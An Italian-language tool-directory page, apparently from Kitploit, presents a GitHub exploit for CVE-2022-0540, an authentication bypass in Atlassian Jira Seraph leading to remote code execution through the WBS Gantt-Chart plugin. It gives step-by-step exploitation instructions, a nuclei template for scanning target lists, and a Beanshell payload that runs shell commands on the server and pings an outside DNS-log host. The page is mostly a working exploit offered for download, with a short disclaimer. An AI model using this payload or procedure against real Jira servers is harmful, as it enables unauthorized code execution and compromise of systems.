Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-0540-RCE — Atlassian Jira Seraph Bypass di Autenticazione RCE(CVE-2022-0540) | Kitploit
Strumenti/GitHubGitHub/pear1y/cve-2022-0540-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneSviluppo Payload
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Atlassian Jira Seraph Bypass di Autenticazione RCE(CVE-2022-0540)

Vedi Repository
711334 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Atlassian Jira Seraph Bypass dell'autenticazione RCE(CVE-2022-0540)

Inglese • Cinese

Dettagli dell'Exploit

Come si vede nel blog dell'autore, atlassian ha fornito una lunga lista di plugin interessati (la stragrande maggioranza dei quali erano falsi positivi), e l'autore ha elencato diversi plugin effettivamente interessati.

image-20220525190523282

Secondo le condizioni indicate, combinate con la documentazione ufficiale per WBS Gantt-Chart for Jira

image-20220525190607569

In sostanza, è un RCE che utilizza lo Beanshell Script del modulo del job scheduler Task; i dettagli dello sfruttamento sono i seguenti.

  1. Per l'operazione manuale è meglio utilizzare la funzione di sostituzione di BurpSuite Proxy > Options > Match and Replace, modificare la regola.

image-20220525190640472

  1. Usa burp come proxy per accedere al software Jira vulnerabile, apri http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; poi puoi controllare la job scheduler configuration

image-20220525190657966

Dal momento che il nostro script Beanshell finale viene eseguito come attività programmata, puoi modificare l'intervallo di esecuzione per tua comodità facendo clic su Modifica e modificandolo secondo il formato Cron.

  1. crea Task

image-20220525190713512

  1. configura Task

image-20220525190728145

Dopo aver completato la configurazione, fai clic su Aggiorna ma verrai reindirizzato alla pagina di login; non preoccuparti, il Task è stato effettivamente aggiunto in background.

  1. Abilita Task

image-20220525190740547

Il Task appena creato è Disabilitato per impostazione predefinita; devi impostarlo manualmente su Abilitato e quindi attendere qualche secondo per l'esecuzione dello Script.

  1. record DNSLOG

image-20220525190756503

allo stesso tempo, puoi trovare il prompt che indica il completamento dell'esecuzione nel job scheduler.

image-20220525190830668


Prerequisiti

root@kitploit:~
WBS Gantt-Chart for Jira <= 9.14.3.1

Verifica dello sfruttamento

root@kitploit:~
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

Esecuzione demo

root@kitploit:~
nuclei -l targets.txt -t exploit.yaml

Screenshot

image-20220525173951955

Riferimenti

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Beanshell Script

root@kitploit:~
import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

Le informazioni menzionate in questo articolo sono destinate esclusivamente a test di penetrazione legittimi e autorizzati, controlli di sicurezza interni dell'azienda e scopi di ricerca. L'utente è responsabile di qualsiasi conseguenza avversa derivante dall'utilizzo delle informazioni fornite in questo articolo.

Scarica lo strumento